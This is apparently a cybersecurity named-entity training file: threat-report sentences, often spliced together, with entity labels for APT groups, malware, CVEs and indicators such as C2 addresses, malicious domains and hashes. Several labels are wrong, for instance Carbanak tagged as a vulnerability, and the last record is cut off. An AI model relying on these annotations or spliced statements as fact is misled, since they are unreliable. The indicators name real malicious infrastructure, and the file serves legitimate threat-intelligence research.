{"text": "Some of its main areas of interest include nuclear physics , computer science and instrumentation , robotics and engineering , and electrical engineering , among others .", "spans": {}, "info": {"id": "cyberner_stix_train_004012", "source": "cyberner_stix_train"}}
{"text": "APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry . Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "ORGANIZATION: telecommunications sector": [[26, 51]], "ORGANIZATION: travel industry": [[87, 102]], "ORGANIZATION: IT firms": [[107, 115]], "ORGANIZATION: high-tech industry": [[140, 158]], "THREAT_ACTOR: RedOctober": [[176, 186]], "ORGANIZATION: Kaspersky Security Network": [[291, 317]], "ORGANIZATION: KSN": [[320, 323]]}, "info": {"id": "cyberner_stix_train_004013", "source": "cyberner_stix_train"}}
{"text": "During one session , the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers , all of which were associated with Russian financial institutions . A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests . Hash : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . HHS HC3 pointed out that some emails included a subject line Victim Organization Date Business Review and gave the user the impression they were opening a secure email from their organization .", "spans": {"THREAT_ACTOR: BlackOasis": [[222, 232]], "THREAT_ACTOR: group": [[297, 302]], "ORGANIZATION: geopolitical": [[334, 346]], "FILEPATH: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[366, 430]], "ORGANIZATION: HHS HC3": [[433, 440]]}, "info": {"id": "cyberner_stix_train_004014", "source": "cyberner_stix_train"}}
{"text": "The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . Development of Bemstour has continued into 2019 .", "spans": {"THREAT_ACTOR: SLUB": [[4, 8]], "VULNERABILITY: CVE-2018-8174": [[99, 112]], "VULNERABILITY: CVE-2019-0752": [[116, 129]], "FILEPATH: Bemstour": [[147, 155]]}, "info": {"id": "cyberner_stix_train_004015", "source": "cyberner_stix_train"}}
{"text": "‘ SimBad ’ has capabilities that can be divided into three groups – Show Ads , Phishing , and Exposure to other applications . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Most of the group 's attacks are focused on government or technology related companies and organizations .", "spans": {"MALWARE: SimBad": [[2, 8]], "TOOL: Remote Desktop Protocol": [[184, 207]], "TOOL: RDP": [[210, 213]], "VULNERABILITY: Carbanak": [[218, 226]], "ORGANIZATION: government": [[321, 331]], "ORGANIZATION: technology related companies": [[335, 363]]}, "info": {"id": "cyberner_stix_train_004016", "source": "cyberner_stix_train"}}
{"text": "It ’ s been SophosLabs ’ observation that Red Alert Trojans usually have a randomized internal name like this . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world . is a RAT program used by APT10 and observed in Japan uniquely . This is a form of cyber attack used to gain an advantage over a competing organization .", "spans": {"MALWARE: Red Alert Trojans": [[42, 59]], "THREAT_ACTOR: APT38": [[112, 117]], "THREAT_ACTOR: regime-backed group": [[158, 177]], "ORGANIZATION: financial institutions": [[233, 255]], "THREAT_ACTOR: APT10": [[314, 319]]}, "info": {"id": "cyberner_stix_train_004017", "source": "cyberner_stix_train"}}
{"text": "According to several timestamps , this payload is used by implant versions created since 2016 . COCCOC is a Vietnam was founded in 2013 . Due to overlapping TTPs , including similar custom tools , Moafee is thought to have a direct or indirect relationship with the threat group DragonOK .", "spans": {"THREAT_ACTOR: COCCOC": [[96, 102]], "THREAT_ACTOR: Moafee": [[197, 203]], "THREAT_ACTOR: group DragonOK": [[273, 287]]}, "info": {"id": "cyberner_stix_train_004018", "source": "cyberner_stix_train"}}
{"text": "Starting in February 2018 , Palo Alto identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": {"ORGANIZATION: Palo Alto": [[28, 37]], "THREAT_ACTOR: Gorgon Group": [[95, 107]], "ORGANIZATION: governmental organizations": [[118, 144]], "TOOL: emails": [[226, 232]], "VULNERABILITY: exploit": [[275, 282]], "VULNERABILITY: CVE-2017-11882": [[291, 305]], "VULNERABILITY: vulnerability": [[306, 319]]}, "info": {"id": "cyberner_stix_train_004019", "source": "cyberner_stix_train"}}
{"text": "Dragos does not corroborate nor conduct political attribution to threat activity .", "spans": {"ORGANIZATION: Dragos": [[0, 6]]}, "info": {"id": "cyberner_stix_train_004020", "source": "cyberner_stix_train"}}
{"text": "New FakeSpy campaign applications leveraging fake postal services apps . We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations . The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out .", "spans": {"MALWARE: FakeSpy": [[4, 11]], "ORGANIZATION: Nasr Institute": [[130, 144]], "THREAT_ACTOR: Group": [[165, 170]], "THREAT_ACTOR: APT33": [[232, 237]], "THREAT_ACTOR: APT35": [[240, 245]], "THREAT_ACTOR: MUDDYWATER": [[252, 262]], "THREAT_ACTOR: GCMAN group": [[366, 377]], "ORGANIZATION: bank": [[444, 448]]}, "info": {"id": "cyberner_stix_train_004021", "source": "cyberner_stix_train"}}
{"text": "If it does , it will commence with the billing process . That said , the \" fingerprints \" left on the samples by the attackers – including techniques used to achieve unauthorized code execution – suggest that the BARIUM APT is behind the effort , according to the researchers . The ZxShell hook code knows that and intercept it . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"THREAT_ACTOR: BARIUM APT": [[213, 223]], "MALWARE: ZxShell": [[282, 289]], "ORGANIZATION: CrowdStrike Services": [[368, 388]], "THREAT_ACTOR: Play ransomware intrusions": [[417, 443]], "TOOL: Microsoft Exchange": [[494, 512]]}, "info": {"id": "cyberner_stix_train_004022", "source": "cyberner_stix_train"}}
{"text": "If the user long-presses the icon , the name of the app responsible for the activity is revealed ( right ) . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks .", "spans": {"MALWARE: RTF attachments": [[153, 168]], "VULNERABILITY: CVE-2017-0199": [[233, 246]], "TOOL: CWS": [[249, 252]], "TOOL: WSA": [[256, 259]]}, "info": {"id": "cyberner_stix_train_004023", "source": "cyberner_stix_train"}}
{"text": "From mTAN to pushTAN In the past few years , some banks in Europe , especially in Germany , stopped using SMS-based authentication and switched to dedicated pushTAN applications for 2FA schemes . Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images . APT34 uses a mix of public and non-public tools and often uses compromised accounts to conduct spear-phishing operations .", "spans": {"ORGANIZATION: Mandiant": [[196, 204]], "THREAT_ACTOR: APT32": [[230, 235]], "THREAT_ACTOR: APT34": [[323, 328]]}, "info": {"id": "cyberner_stix_train_004024", "source": "cyberner_stix_train"}}
{"text": "If it is the first execution , and if the app ’ s path does not contain “ /system/app ” ( i.e . Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices . After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests .", "spans": {"THREAT_ACTOR: APT41": [[105, 110]], "ORGANIZATION: parent company": [[134, 148]], "THREAT_ACTOR: APT28": [[305, 310]]}, "info": {"id": "cyberner_stix_train_004025", "source": "cyberner_stix_train"}}
{"text": "However , they have started changing their macOS malware .", "spans": {"SYSTEM: macOS": [[43, 48]]}, "info": {"id": "cyberner_stix_train_004026", "source": "cyberner_stix_train"}}
{"text": "Of course , this does not mean the digital signature of the software developer can be used . TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks . This version embeds the 17 modules listed in the following table : An attacker could place HTML containing executable JavaScript inside element attributes .", "spans": {"ORGANIZATION: TAA": [[93, 96]], "ORGANIZATION: Symantec": [[180, 188]], "VULNERABILITY: An attacker could place HTML containing executable JavaScript inside element attributes": [[343, 430]]}, "info": {"id": "cyberner_stix_train_004027", "source": "cyberner_stix_train"}}
{"text": "The malware also sends regular telemetry back to its C2 server about the infected device in the form of an HTTP POST to its C2 server . APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 . but the introduced IDA Pro plugin HexRaysDeob didn’t work for one of the obfuscated ANEL samples because the tool was made for another variant of the obfuscation . Mandiant observed log entries in jcagent.log that indicated a directive named “ Runworkflow ” triggered execution on the system :", "spans": {"THREAT_ACTOR: APT38": [[136, 141]], "ORGANIZATION: banks": [[188, 193]], "ORGANIZATION: financial entities": [[198, 216]], "TOOL: IDA Pro": [[258, 265]], "TOOL: HexRaysDeob": [[273, 284]], "MALWARE: ANEL": [[323, 327]]}, "info": {"id": "cyberner_stix_train_004028", "source": "cyberner_stix_train"}}
{"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe .", "spans": {"VULNERABILITY: CVE-2012-0158": [[23, 36]], "FILEPATH: Mimikatz Lite": [[227, 240]], "FILEPATH: GetPassword.exe": [[244, 259]]}, "info": {"id": "cyberner_stix_train_004029", "source": "cyberner_stix_train"}}
{"text": "The proliferation of Android devices – from smartphones to tablets and smart TVs – has opened up new possibilities for malware developers , as all these devices pack microphones , cameras and location-tracking hardware they can turn into the perfect spy tools . SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto .", "spans": {"MALWARE: Android": [[21, 28]], "THREAT_ACTOR: SectorJ04": [[262, 271]], "ORGANIZATION: financial": [[319, 328]], "MALWARE: Remote Desktop Protocol": [[454, 477]], "MALWARE: RDP": [[480, 483]], "MALWARE: Carbanak": [[488, 496]]}, "info": {"id": "cyberner_stix_train_004030", "source": "cyberner_stix_train"}}
{"text": "Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT Maudi Surveillance Operation which was previously reported in 2013 . We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "VULNERABILITY: CVE-2018-0798": [[54, 67]], "THREAT_ACTOR: Maudi": [[145, 150]], "THREAT_ACTOR: Bahamut": [[244, 251]]}, "info": {"id": "cyberner_stix_train_004031", "source": "cyberner_stix_train"}}
{"text": "The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in , or preparing to invest in , the country . That changed on Jan. 25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date .", "spans": {"THREAT_ACTOR: APT32": [[45, 50]], "ORGANIZATION: FireEye": [[66, 73]], "ORGANIZATION: business": [[135, 143]], "ORGANIZATION: security firm": [[229, 242]], "ORGANIZATION: CrowdStrike": [[243, 254]]}, "info": {"id": "cyberner_stix_train_004032", "source": "cyberner_stix_train"}}
{"text": "While they have been quiet since our June analysis , we observed an increase in the group ’s activities in December , with updates on the kits ’ capabilities reminiscent of their previous attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_004033", "source": "cyberner_stix_train"}}
{"text": "Tricky Configurations TrickMo uses the shared preferences mechanism to store settings and data that the malware uses at runtime . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": {"MALWARE: TrickMo": [[22, 29]], "MALWARE: Pony": [[178, 182]], "MALWARE: Vawtrak": [[187, 194]], "THREAT_ACTOR: OilRig": [[275, 281]], "THREAT_ACTOR: OilRig attack": [[415, 428]], "ORGANIZATION: government": [[454, 464]], "FILEPATH: N56.15.doc": [[467, 477]], "FILEPATH: 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00": [[480, 544]]}, "info": {"id": "cyberner_stix_train_004034", "source": "cyberner_stix_train"}}
{"text": "One such email that we were able to obtain was targeting users in Turkey , as shown in Figure 4:Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey , Pakistan , Tajikistan and India . This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat .", "spans": {"TOOL: attachments": [[208, 219]], "FILEPATH: Ploutus-D": [[437, 446]], "ORGANIZATION: financial": [[464, 473]]}, "info": {"id": "cyberner_stix_train_004035", "source": "cyberner_stix_train"}}
{"text": "Map of potential targets Early samples of FrozenCell used an online service for storing geolocation information of infected devices . Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 exposé on Hidden Lynx . As covered in the previous “ Attack Lifecycle ” section , WEBC2 backdoor variants download and interpret data stored between tags in HTML pages as commands . When they pay for someone else ’s malware kit , whether it be ransomware or a phishing bot , they do n’t have to invest time , money or labor to write their own malicious code or tools and instead can hop right into deploying the malware .", "spans": {"MALWARE: FrozenCell": [[42, 52]], "THREAT_ACTOR: Hidden Lynx": [[305, 316]], "MALWARE: WEBC2 backdoor": [[377, 391]], "TOOL: HTML": [[452, 456]]}, "info": {"id": "cyberner_stix_train_004036", "source": "cyberner_stix_train"}}
{"text": "These dumpers create log files indicating the presence or absence of potential databases to dump :", "spans": {}, "info": {"id": "cyberner_stix_train_004037", "source": "cyberner_stix_train"}}
{"text": "While ESET telemetry data indicates that this URL was delivered by spearphishing emails , we don’t have a sample of such an email .", "spans": {"ORGANIZATION: ESET": [[6, 10]], "TOOL: emails": [[81, 87]], "TOOL: email": [[124, 129]]}, "info": {"id": "cyberner_stix_train_004038", "source": "cyberner_stix_train"}}
{"text": "The Trojan intercepts incoming SMSs and can receive the following commands from them : “ 3458 ” — revoke device administrator privileges from the app ; “ hi ” , “ ask ” — enable and disable mobile internet ; “ privet ” , “ ru ” — enable and disable Wi-Fi ; “ check ” — send text “ install : [ device IMEI ] ” to phone number from which SMS was sent ; “ stop_blocker ” — stop displaying all blocking HTML pages ; “ 393838 ” — change C & C address to that specified in the Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network . Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East .", "spans": {"MALWARE: Infostealer.Catchamas": [[552, 573]], "THREAT_ACTOR: Leafminer": [[620, 629]]}, "info": {"id": "cyberner_stix_train_004039", "source": "cyberner_stix_train"}}
{"text": "TeamViewer has also been used in the \" Sheldor \" attack campaign , which was detected between 2010 and 2011 , and which resulted in assets stolen at the value of $600k and $832k . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": {"TOOL: TeamViewer": [[0, 10]], "THREAT_ACTOR: PLATINUM": [[180, 188]], "ORGANIZATION: specific individuals": [[262, 282]], "VULNERABILITY: zero-day": [[323, 331]]}, "info": {"id": "cyberner_stix_train_004040", "source": "cyberner_stix_train"}}
{"text": "TA505 operates a variety of C&C servers , allowing it to be resilient in the case of takedowns , sinkholes , and other defensive operations .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "TOOL: C&C": [[28, 31]]}, "info": {"id": "cyberner_stix_train_004041", "source": "cyberner_stix_train"}}
{"text": "At the time this malware was reported by several security vendors , and attributed to different malware families like Ghostpush , MonkeyTest , and Xinyinhe . APT38 's targeting of financial institutions is most likely an effort by the North Korean government to supplement their heavily-sanctioned economy . OR by -2 ( 0xFFFFFFFE ) But as a new documentary series on Hulu reveals [ SPOILER ALERT ! ] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": {"MALWARE: Ghostpush": [[118, 127]], "MALWARE: MonkeyTest": [[130, 140]], "MALWARE: Xinyinhe": [[147, 155]], "THREAT_ACTOR: APT38": [[158, 163]], "ORGANIZATION: financial institutions": [[180, 202]], "ORGANIZATION: Hulu": [[367, 371]]}, "info": {"id": "cyberner_stix_train_004042", "source": "cyberner_stix_train"}}
{"text": "module for submitting all exfiltrated data to the server . With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . Lotus Blossom : DRAGONFISH , Spring Dragon .", "spans": {"MALWARE: SWAnalytics": [[83, 94]], "THREAT_ACTOR: Lotus Blossom": [[207, 220]], "THREAT_ACTOR: DRAGONFISH": [[223, 233]], "THREAT_ACTOR: Spring Dragon": [[236, 249]]}, "info": {"id": "cyberner_stix_train_004043", "source": "cyberner_stix_train"}}
{"text": "Mobile ViceLeaker The following table shows meta information on the observed samples , including compiler timestamps : MD5 Package Compiler C2 51df2597faa3fce38a4c5ae024f97b1c com.xapps.SexGameForAdults dexlib 2.x 188.165.28 [ . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . In order to evade network level detection , the downloader uses steganography .", "spans": {"MALWARE: ViceLeaker": [[7, 17]], "MALWARE: Bisonal malware": [[261, 276]], "TOOL: downloader": [[382, 392]]}, "info": {"id": "cyberner_stix_train_004044", "source": "cyberner_stix_train"}}
{"text": "spear phishing : analytics-google.org : 69/checkFile.aspx .", "spans": {"URL: analytics-google.org : 69/checkFile.aspx": [[17, 57]]}, "info": {"id": "cyberner_stix_train_004045", "source": "cyberner_stix_train"}}
{"text": "Trend of the year : mobile banking Trojans 2013 was marked by a rapid rise in the number of Android banking Trojans . TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others . The path to wmplayer.exe is provided by the Config module . Additionally , Mandiant has observed the use of the SoftPerfect network scanner ( netscan.exe ) to perform internal network enumeration .", "spans": {"SYSTEM: Android": [[92, 99]], "TOOL: TClient": [[118, 125]], "FILEPATH: wmplayer.exe": [[230, 242]], "TOOL: SoftPerfect network scanner ( netscan.exe )": [[330, 373]]}, "info": {"id": "cyberner_stix_train_004046", "source": "cyberner_stix_train"}}
{"text": "Use of legitimate site ( Pastebin ) to host malicious code ( to bypass security monitoring ) .", "spans": {"TOOL: Pastebin": [[25, 33]]}, "info": {"id": "cyberner_stix_train_004047", "source": "cyberner_stix_train"}}
{"text": "In theory , the additional modules can do virtually anything on the victim system .", "spans": {}, "info": {"id": "cyberner_stix_train_004048", "source": "cyberner_stix_train"}}
{"text": "They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"ORGANIZATION: financial": [[53, 62]], "ORGANIZATION: economic": [[65, 73]], "ORGANIZATION: trade policy": [[78, 90]], "TOOL: publicly available RATs": [[109, 132]], "TOOL: Poison Ivy": [[141, 151]], "TOOL: non-public backdoors": [[167, 187]], "MALWARE: Trojan.Naid": [[296, 307]], "FILEPATH: Backdoor.Moudoor": [[310, 326]], "MALWARE: Backdoor.Hikit": [[333, 347]]}, "info": {"id": "cyberner_stix_train_004049", "source": "cyberner_stix_train"}}
{"text": "Downeks makes a POST request to dw.downloadtesting.com , resulting in the installation of the Quasar RAT on the victim machine .", "spans": {"MALWARE: Downeks": [[0, 7]], "DOMAIN: dw.downloadtesting.com": [[32, 54]], "MALWARE: Quasar": [[94, 100]], "TOOL: RAT": [[101, 104]]}, "info": {"id": "cyberner_stix_train_004050", "source": "cyberner_stix_train"}}
{"text": "Configure network logs to provide adequate information to assist in quickly developing an accurate determination of a security incident .", "spans": {}, "info": {"id": "cyberner_stix_train_004051", "source": "cyberner_stix_train"}}
{"text": "This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" . This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": {"ORGANIZATION: FireEye": [[220, 227]], "MALWARE: TRITON": [[260, 266]], "ORGANIZATION: research institution": [[318, 338]], "THREAT_ACTOR: TEMP.Veles": [[364, 374]]}, "info": {"id": "cyberner_stix_train_004052", "source": "cyberner_stix_train"}}
{"text": "from only one misconfigured command and control server ( out of over 37 servers ) . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country . APT1 maintains an extensive infrastructure of computers around the world . This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites .", "spans": {"TOOL: GozNym": [[106, 112]], "ORGANIZATION: banks": [[156, 161]], "ORGANIZATION: community banks": [[253, 268]], "ORGANIZATION: email service providers": [[273, 296]], "THREAT_ACTOR: APT1": [[331, 335]], "THREAT_ACTOR: threat actors": [[419, 432]], "TOOL: a suite of malware tools": [[440, 464]]}, "info": {"id": "cyberner_stix_train_004053", "source": "cyberner_stix_train"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817469 [ . As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure . Release_Time : unknow Report_URL : https://attack.mitre.org/groups/ APT19 ： Codoso , C0d0so0 , Codoso Team , Sunshop Group .", "spans": {"THREAT_ACTOR: threat vector": [[125, 138]], "THREAT_ACTOR: APT19": [[266, 271]], "THREAT_ACTOR: Codoso": [[274, 280]], "THREAT_ACTOR: C0d0so0": [[283, 290]], "THREAT_ACTOR: Codoso Team": [[293, 304]], "THREAT_ACTOR: Sunshop Group": [[307, 320]]}, "info": {"id": "cyberner_stix_train_004054", "source": "cyberner_stix_train"}}
{"text": "Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others .", "spans": {"TOOL: Poison Ivy": [[0, 10]], "TOOL: RATs": [[58, 62]], "MALWARE: Bookworm": [[221, 229]], "TOOL: C2": [[286, 288]], "MALWARE: FFRAT": [[338, 343]], "MALWARE: Poison Ivy": [[346, 356]], "MALWARE: PlugX": [[359, 364]]}, "info": {"id": "cyberner_stix_train_004055", "source": "cyberner_stix_train"}}
{"text": "The stolen data is sent to the C2 server using the URL ending with /servlet/xx . Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign . FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week .", "spans": {"MALWARE: PYTHON33.dll": [[126, 138]], "MALWARE: inicore_v2.3.30.dll": [[151, 170]], "TOOL: SysUpdate": [[287, 296]], "THREAT_ACTOR: Emissary Panda": [[316, 330]], "ORGANIZATION: FireEye": [[342, 349]], "TOOL: command-and-control": [[389, 408]], "TOOL: CnC": [[411, 414]], "THREAT_ACTOR: Ke3chang actor": [[441, 455]]}, "info": {"id": "cyberner_stix_train_004056", "source": "cyberner_stix_train"}}
{"text": "This file is decrypted and injected into an instance of InstallUtiil.exe , and functions as a Tor anonymizer . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": {"MALWARE: InstallUtiil.exe": [[56, 72]], "MALWARE: Tor": [[94, 97]], "MALWARE: anonymizer": [[98, 108]], "ORGANIZATION: US-CERT Code Analysis Team": [[161, 187]], "FILEPATH: botnet controller": [[197, 214]]}, "info": {"id": "cyberner_stix_train_004057", "source": "cyberner_stix_train"}}
{"text": "Cobalt Strike appears to be one of BRONZE PRESIDENT 's preferred remote access tools .", "spans": {"TOOL: Cobalt Strike": [[0, 13]], "THREAT_ACTOR: BRONZE PRESIDENT": [[35, 51]]}, "info": {"id": "cyberner_stix_train_004058", "source": "cyberner_stix_train"}}
{"text": "] 204 [ . Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows . It is clear that the text is a base64 encoded command , that is then executed by the above VBScript . Mandiant has observed an increase in financially motivated operations by DPRK actors in the past year , particularly those focused on the cryptocurrency industry .", "spans": {"TOOL: Komplex": [[10, 17]], "THREAT_ACTOR: Sofacy": [[100, 106], [134, 140]], "TOOL: Carberp": [[113, 120]], "TOOL: VBScript": [[299, 307]], "THREAT_ACTOR: DPRK actors": [[383, 394]]}, "info": {"id": "cyberner_stix_train_004059", "source": "cyberner_stix_train"}}
{"text": "It requests permission to access the additional storage . Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon . and the destination of goto jump instruction are updated . Symantec has identified MuddyWater as responsible for a new cyberespionage campaign targeting telecommunication and IT service providers in Asia and the Middle East for over six months .", "spans": {"THREAT_ACTOR: Gamaredon": [[185, 194]], "ORGANIZATION: Symantec": [[256, 264]], "THREAT_ACTOR: MuddyWater": [[280, 290]], "ORGANIZATION: telecommunication and IT service providers": [[350, 392]]}, "info": {"id": "cyberner_stix_train_004060", "source": "cyberner_stix_train"}}
{"text": "Otherwise , in the case of conditional opcodes , the variable part can contain the next JIT packet ID or the next relative virtual address ( RVA ) where code execution should continue . In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware . Winnti : dde82093decde6371eb852a5e9a1aa4acf3b56ba https://bugcheck.xigncodeservice.com/Common/Lib/common.php . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": {"THREAT_ACTOR: actors": [[229, 235]], "THREAT_ACTOR: Winnti": [[360, 366]], "FILEPATH: dde82093decde6371eb852a5e9a1aa4acf3b56ba": [[369, 409]], "URL: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[410, 468]], "THREAT_ACTOR: LockBit": [[471, 478]], "ORGANIZATION: US organizations": [[525, 541]], "ORGANIZATION: CISA": [[611, 615]]}, "info": {"id": "cyberner_stix_train_004061", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 45.63.10.99 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 45.63.10.99": [[11, 22]]}, "info": {"id": "cyberner_stix_train_004062", "source": "cyberner_stix_train"}}
{"text": "Every five minutes it collects basic system information and sends it to the C2 server .", "spans": {"TOOL: C2": [[76, 78]]}, "info": {"id": "cyberner_stix_train_004063", "source": "cyberner_stix_train"}}
{"text": "However , an investigation by Symantec has found that Butterfly has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number . The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers . Turla is a well-documented , long operating APT group that is widely believed to be a Russian state-sponsored organization . Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 . More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . Assuming this variant of KopiLuwak has been observed in the wild , there are a number of ACTs it may have been delivered including some of Turla’s previous attack methods such as spear phishing or via a watering hole . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists . Turla's goal could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla’s more fully featured implants . Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations . We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak .", "spans": {"ORGANIZATION: Symantec": [[30, 38]], "THREAT_ACTOR: Butterfly": [[54, 63]], "THREAT_ACTOR: Turla": [[308, 313], [450, 455], [575, 580], [710, 715], [2541, 2546], [2980, 2985]], "ORGANIZATION: G20": [[333, 336]], "ORGANIZATION: RUAG": [[741, 745]], "ORGANIZATION: GovCERT.ch": [[809, 819]], "FILEPATH: MSIL dropper": [[893, 905], [1638, 1650], [1701, 1713]], "ORGANIZATION: Proofpoint": [[932, 942], [2001, 2011]], "THREAT_ACTOR: Turla’s": [[1127, 1134], [2502, 2509]], "ORGANIZATION: diplomats": [[1226, 1235]], "ORGANIZATION: journalists": [[1331, 1342]], "THREAT_ACTOR: Turla's": [[1345, 1352]], "ORGANIZATION: Digital Economy": [[1431, 1446]], "FILEPATH: KopiLuwak": [[1561, 1570], [1962, 1971], [2179, 2188]], "TOOL: PDF": 